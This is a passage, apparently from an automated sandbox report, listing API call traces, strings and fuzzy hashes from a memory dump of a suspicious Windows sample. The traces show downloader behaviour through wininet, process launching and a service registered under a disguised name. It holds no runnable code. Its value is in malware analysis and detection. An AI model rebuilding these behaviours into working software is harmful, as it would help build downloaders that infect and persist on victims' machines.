                                • VariantClear.OLEAUT32(?), ref: 006E4D57
                                • _com_issue_error.COMSUPPD ref: 006E4D5E
                                • VariantClear.OLEAUT32(?), ref: 006E4DC2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Variant$Clear$_com_issue_error$InitWindow
                                • String ID: Where Name Like '%$__atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 3732622881-2074810242
                                • Opcode ID: 817e7a153bb21b7e3dc616a97bfbdc23a8cc02dc45e960403ce6bc3bc02eb906
                                • Instruction ID: 9b4be4807965ad11b00bca9166a982e133ba1a2825ba4fd4be5f1403e3394cd8
                                • Opcode Fuzzy Hash: 817e7a153bb21b7e3dc616a97bfbdc23a8cc02dc45e960403ce6bc3bc02eb906
                                • Instruction Fuzzy Hash: 8CF12134D11389AACB10EBB8CC41BEEB7BAAF58310F14425DE615A33C1DF749A05CB69
                                APIs
                                • LoadLibraryA.KERNEL32(wininet.dll), ref: 10005D11
                                • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10005D25
                                • FreeLibrary.KERNEL32(00000000), ref: 10005D42
                                • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 10005D57
                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 10005D88
                                • _memset.LIBCMT ref: 10005DAE
                                • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 10005DBC
                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10005DFC
                                • CloseHandle.KERNEL32(?), ref: 10005E11
                                • Sleep.KERNEL32(00000001), ref: 10005E19
                                • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 10005E25
                                • FreeLibrary.KERNEL32(00000000), ref: 10005E3A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                • String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
                                • API String ID: 1463273941-4269851202
                                • Opcode ID: 079f415b656d7d7c2fce47019132121de9530b0a032dfab261f89c29c8d3594b
                                • Instruction ID: 75aba9b1d86e2333b3953afca25069c7bf22692956b95e96d4ebfacd9a9df9bc
                                • Opcode Fuzzy Hash: 079f415b656d7d7c2fce47019132121de9530b0a032dfab261f89c29c8d3594b
                                • Instruction Fuzzy Hash: AF418F71A40218BBE720DBE4CC85FEFB7B8EF48741F108159F714AB180DA71AA418BA4
                                APIs
                                • CallNextHookEx.USER32(?,00000003,?,?), ref: 006F6D43
                                • GetClassLongA.USER32(?,000000E6), ref: 006F6DD0
                                • CallNextHookEx.USER32(?,00000003,00000000,00000000), ref: 006F70B0
                                • UnhookWindowsHookEx.USER32(?), ref: 006F70C6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Hook$CallNext$ClassLongUnhookWindows
                                • String ID: #32768$0$AfxOldWndProc423$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp$ime
                                • API String ID: 922673391-2182386977
                                • Opcode ID: ac344eb70a32df99729f2e93f2048e68fb162c4a2b5a8d45bdc5aed95d5f3aa0
                                • Instruction ID: 5e5b08b4b7ed7320e436bf2ec30d515379a149c9b0f43bbd1d0c87dd4e447310
                                • Opcode Fuzzy Hash: ac344eb70a32df99729f2e93f2048e68fb162c4a2b5a8d45bdc5aed95d5f3aa0
                                • Instruction Fuzzy Hash: BFC17CB5A0420CDBCB14DFA4D849BFEB7B6BF88704F108529F615A7391DB789981CB60
                                APIs
                                  • Part of subcall function 007261F0: _swprintf_s.LIBCMTD ref: 00726214
                                • IsWindow.USER32(000000FE), ref: 006F7BEC
                                • SendMessageA.USER32(000000FE,00000360,00000000,00000000), ref: 006F7C4B
                                • DefWindowProcA.USER32(000000FE,0000000D,00000040,?), ref: 006F7C7C
                                • GetClassNameA.USER32(000000FE,?,00000040), ref: 006F7CB3
                                • GetWindowLongA.USER32(000000FE,000000F0), ref: 006F7D2E
                                • GetWindowLongA.USER32(000000FE,000000F0), ref: 006F7D52
                                • GetDlgCtrlID.USER32(000000FE), ref: 006F7D66
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$Long$ClassCtrlMessageNameProcSend_swprintf_s
                                • String ID: caption = "$class name = "$id = $m_hWnd = $parent CWnd* = $rect = $style = $ (Detached or temporary window)$ (illegal HWND)$ (permanent window)
                                • API String ID: 2791014370-687963174
                                • Opcode ID: 9b04d2788bcea729d4247afad90a42e7f52eaf581e6576c6f9a85a629905f3c9
                                • Instruction ID: d58d5dc416bfb008eda8e599c6c6497ef15e921e450fb8c6e2ac437f2a1879a2
                                • Opcode Fuzzy Hash: 9b04d2788bcea729d4247afad90a42e7f52eaf581e6576c6f9a85a629905f3c9
                                • Instruction Fuzzy Hash: FC51C871A4421CEBCB14EBA4DC9AEBE7776BF84700F504618B509AF2D5CB34AD41CB94
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 006E5FF9
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(?), ref: 006E60F9
                                • _com_util::ConvertStringToBSTR.COMSUPPD ref: 006E6150
                                • VariantCopy.OLEAUT32(?,00000000), ref: 006E6174
                                • _com_issue_error.COMSUPPD ref: 006E617F
                                • _com_issue_error.COMSUPPD ref: 006E6189
                                • VariantClear.OLEAUT32(?), ref: 006E6198
                                • VariantClear.OLEAUT32(?), ref: 006E61A2
                                • InterlockedDecrement.KERNEL32(?), ref: 006E61C6
                                • SysFreeString.OLEAUT32(00000000), ref: 006E61D7
                                • VariantClear.OLEAUT32(?), ref: 006E6212
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: StringVariant$ClearConvertInterlocked_com_issue_error_com_util::$DecrementFree$CopyIncrementInit
                                • String ID: GROUP BY RegId$RSum$SELECT SUM(Price*PNum) AS RSum FROM PayItems WHERE RegId=$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 803939733-3032493280
                                • Opcode ID: bdeeff474da7a8e5b6ec9d86e116bd90fd86a0839eb2eceadccb3bfc3fdde061
                                • Instruction ID: 37c3f37534a5e783b0a9b89b1b4b2142d4e071e674ac6bec57834eb7b13c62e9
                                • Opcode Fuzzy Hash: bdeeff474da7a8e5b6ec9d86e116bd90fd86a0839eb2eceadccb3bfc3fdde061
                                • Instruction Fuzzy Hash: ED913371D01755AFDB10DBA9CD01BDEB7B9EFA4310F108608F518A7381DB74AA05CBA2
                                APIs
                                • _memset.LIBCMT ref: 10005749
                                • _memset.LIBCMT ref: 10005787
                                • lstrcpyA.KERNEL32(00000000,?), ref: 100057FB
                                • _memset.LIBCMT ref: 1000583B
                                • wsprintfA.USER32 ref: 10005853
                                • _memset.LIBCMT ref: 10005867
                                • _memset.LIBCMT ref: 10005881
                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 100058C9
                                • lstrcatA.KERNEL32(?,10015500), ref: 10005911
                                • lstrcatA.KERNEL32(?,?), ref: 1000591B
                                • lstrcpyA.KERNEL32(00000000,?), ref: 10005921
                                • _memset.LIBCMT ref: 1000592F
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10005977
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$lstrcatlstrcpy$CreateEnvironmentExpandProcessStringswsprintf
                                • String ID: "%1$%s\shell\open\command$D
                                • API String ID: 3832221517-1634606264
                                • Opcode ID: aeb27809cb331988358cda74122baf96d8779bc5aff2c1345c4456941f2988b7
                                • Instruction ID: e0ef36058953718d4a620fadb14e10300cc6370a68f30222c5edef3997eb4161
                                • Opcode Fuzzy Hash: aeb27809cb331988358cda74122baf96d8779bc5aff2c1345c4456941f2988b7
                                • Instruction Fuzzy Hash: A4612B71D04754FAFB21C790DC49FDF77A8EB44782F144085FA48AA085E7B6AB84CB91
                                APIs
                                • LoadLibraryW.KERNEL32(MSPDB100.DLL,?), ref: 0090F821
                                • LoadLibraryW.KERNEL32(ADVAPI32.DLL), ref: 0090F830
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: ADVAPI32.DLL$EnvironmentDirectory$MSPDB100.DLL$RegCloseKey$RegOpenKeyExW$RegQueryValueExW$SOFTWARE\Microsoft\VisualStudio\10.0\Setup\VS$\
                                • API String ID: 1029625771-326676442
                                • Opcode ID: 1a7621c61a900a26d072002ba9edfe14368c1112e642ec59da6ca7f77466a736
                                • Instruction ID: cf1a45c38df5e362457bc9505eb764bf3b60b2a08f9df13b8e4b501210669f31
                                • Opcode Fuzzy Hash: 1a7621c61a900a26d072002ba9edfe14368c1112e642ec59da6ca7f77466a736
                                • Instruction Fuzzy Hash: CF51FB326142189FDB34DFA8EC58BD9B3E9EF94304F1081BED809972A1DB709E418B91
                                APIs
                                • StringFromCLSID.OLE32(?,00000000), ref: 006F3C44
                                • _swprintf_s.LIBCMTD ref: 006F3CEE
                                • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,00020019,00000000), ref: 006F3D12
                                • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000064), ref: 006F3D31
                                • RegCloseKey.ADVAPI32(00000000), ref: 006F3D3B
                                • CoTaskMemFree.OLE32(00000000), ref: 006F3DD3
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • _swprintf_s.LIBCMTD ref: 006F3D5D
                                • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,00020019,00000000), ref: 006F3D81
                                • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000064), ref: 006F3DA0
                                • RegCloseKey.ADVAPI32(00000000), ref: 006F3DAA
                                • _wcscpy_s.LIBCMTD ref: 006F3DC4
                                  • Part of subcall function 008E3370: __invalid_parameter.LIBCMTD ref: 008E33E2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseMessageOpenQueryValue_swprintf_s$FreeFromPeekPostQuitStringTask__invalid_parameter_wcscpy_s
                                • String ID: CLSID\%s$Interface\%s$d$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp
                                • API String ID: 548346384-779681519
                                • Opcode ID: 8379b919f89e738f0a931ba51545955570680dd14215dc95cb841226f50d5b0e
                                • Instruction ID: 4db623c7cedf178a4633b51dad827758cf43f19341b66f3c9ca9cd697070ceee
                                • Opcode Fuzzy Hash: 8379b919f89e738f0a931ba51545955570680dd14215dc95cb841226f50d5b0e
                                • Instruction Fuzzy Hash: BD619F71E00218EFEB24DBA4CC46FEEB775EF44700F108199E619AA2C1DB745A89CF61
                                APIs
                                  • Part of subcall function 00702440: ActivateActCtx.KERNEL32(?,00000000,ED5B0DC1,?,00000000), ref: 00702489
                                • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 007B0FD0
                                • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 007B0FE8
                                • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 007B1000
                                • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 007B1018
                                • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 007B1030
                                • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 007B1048
                                • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 007B1060
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Activate
                                • String ID: CloseThemeData$DrawThemeBackground$GetCurrentThemeName$GetThemeColor$GetThemeSysColor$GetWindowTheme$OpenThemeData$UxTheme.dll
                                • API String ID: 2388279185-1975976892
                                • Opcode ID: d68201791db61acba3f7213c6c2d6220f2924d28a74a7cbfdfe4dff90580b80a
                                • Instruction ID: 51e9d67e4da68ec52b6fc9a3cad83af1480094cec91dcad1f00dcfb553026855
                                • Opcode Fuzzy Hash: d68201791db61acba3f7213c6c2d6220f2924d28a74a7cbfdfe4dff90580b80a
                                • Instruction Fuzzy Hash: 556175B4A1035ADFD714DF94C894BAEBBB1FB48708F104A58E8216B391D776E845CF90
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00936CFC,00000000,00942820,00000000,00937464,00000000,?,ED5B0DC1), ref: 007E5F4D
                                • __splitpath_s.LIBCMTD ref: 007E5F7F
                                • __splitpath_s.LIBCMTD ref: 007E5FAB
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00937464,00000000,?,ED5B0DC1), ref: 007E600B
                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 007E6029
                                • CloseHandle.KERNEL32(000000FF), ref: 007E603C
                                • LoadImageA.USER32(00000000,00000000,00000000,00000000,00000000,00002010), ref: 007E60A9
                                • GetLastError.KERNEL32 ref: 007E60CA
                                • GetObjectA.GDI32(00000000,00000018,00000000), ref: 007E612F
                                • __wmakepath_s.LIBCMTD ref: 007E5FDB
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • DeleteObject.GDI32(00000000), ref: 007E615E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 007E61C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$MessageObject__splitpath_s$AttributesCloseCreateDeleteErrorHandleImageLastLoadModuleNamePeekPostQuitSize__wmakepath_s
                                • String ID: Can't load bitmap: %s. GetLastError() = %x$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
                                • API String ID: 3499527200-1538316549
                                • Opcode ID: f8b133e239926486a5bc79682d5c7daf477b8e338e4448fd31f4800dfa6b1170
                                • Instruction ID: 44ab77dbc45687f53cf3e1c925e34e51721643f83c3ff2326c1a6b8801e663c8
                                • Opcode Fuzzy Hash: f8b133e239926486a5bc79682d5c7daf477b8e338e4448fd31f4800dfa6b1170
                                • Instruction Fuzzy Hash: ECC1B170900618EBDB24DB64CC55FEEB3B5BB08351F104298F519AB2C1DB78AE85CF50
                                APIs
                                • EnterCriticalSection.KERNEL32(?,ED5B0DC1,?,?,?,?,009141B0,000000FF,?,0072202E,?,00000000,?,?,006F0CD4), ref: 00721A18
                                • LeaveCriticalSection.KERNEL32(?,f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp,00000110,?,?,?,?,009141B0,000000FF,?,0072202E), ref: 00721A9D
                                • TlsGetValue.KERNEL32(?,f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp,00000110,?,?,?,?,009141B0,000000FF,?,0072202E), ref: 00721AAE
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00721B00
                                • shared_ptr.LIBCMTD ref: 00721B90
                                • LocalAlloc.KERNEL32(00000000,00000000,?,?,?,009141B0), ref: 00721BB2
                                • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 00721BEE
                                • _memset.LIBCMT ref: 00721C24
                                • TlsSetValue.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00721C42
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$LeaveProcessorValueVirtual$AllocConcurrency::EnterLocalRootRoot::_memsetshared_ptr
                                • String ID: . r$. r$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp
                                • API String ID: 2127320721-2616814704
                                • Opcode ID: beba78a1aae4d393f0fe0aad31327ec6754e13678c0e5c3e4200b3422fac9dd0
                                • Instruction ID: aec4729cd9c3d79e25720e2bcc442d603c15c20c11b9e2260e5600904f08a9aa
                                • Opcode Fuzzy Hash: beba78a1aae4d393f0fe0aad31327ec6754e13678c0e5c3e4200b3422fac9dd0
                                • Instruction Fuzzy Hash: A4913C74A00209DFCB14DF94D985BAEB7B2FF58314F608158E805AB381D739AE81CFA1
                                APIs
                                • RegisterServiceCtrlHandlerA.ADVAPI32(Rsymwe miusskwq,Function_00003F80), ref: 100041D6
                                • SetServiceStatus.ADVAPI32(00000000,1001D28C), ref: 10004227
                                • Sleep.KERNEL32(000001F4), ref: 1000423A
                                • GetVersionExA.KERNEL32(?), ref: 1000424D
                                • SetServiceStatus.ADVAPI32(00000000,1001D28C), ref: 10004272
                                  • Part of subcall function 100078E0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,7555B5F0,00000000,00000000,00000000,00000000), ref: 100078FB
                                  • Part of subcall function 100078E0: WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000792D
                                  • Part of subcall function 100078E0: CloseHandle.KERNEL32(?), ref: 10007937
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000429E
                                • CloseHandle.KERNEL32(00000000), ref: 100042A5
                                • Sleep.KERNEL32(0000003C), ref: 100042A9
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100042BA
                                • wsprintfA.USER32 ref: 100042D3
                                • CloseHandle.KERNEL32(00000000), ref: 100042E9
                                • SetServiceStatus.ADVAPI32(00000000,1001D28C), ref: 10004304
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandleStatus$ObjectSingleSleepWait$CreateCtrlEventFileHandlerModuleNameRegisterVersionwsprintf
                                • String ID: %s Win7$Rsymwe miusskwq
                                • API String ID: 4062716089-2554555809
                                • Opcode ID: a1428d71dd53cc19821e2301c98be36f1d359ee28336edc1a7d2db7bf0d82de5
                                • Instruction ID: d797a4669c658ad7b690d73ffad459bb7dd9983f24ca27de5205b3eda01857fc
                                • Opcode Fuzzy Hash: a1428d71dd53cc19821e2301c98be36f1d359ee28336edc1a7d2db7bf0d82de5
                                • Instruction Fuzzy Hash: CE313EB1400228EBF750FBA0CC89F9A77A8EB19345F048245E6189B191DBB5E5449BA5
                                APIs
                                • LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 10006FF1
                                • GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 10007004
                                • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 1000700F
                                • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 1000701A
                                • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 10007025
                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 1000702F
                                • GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 1000703C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
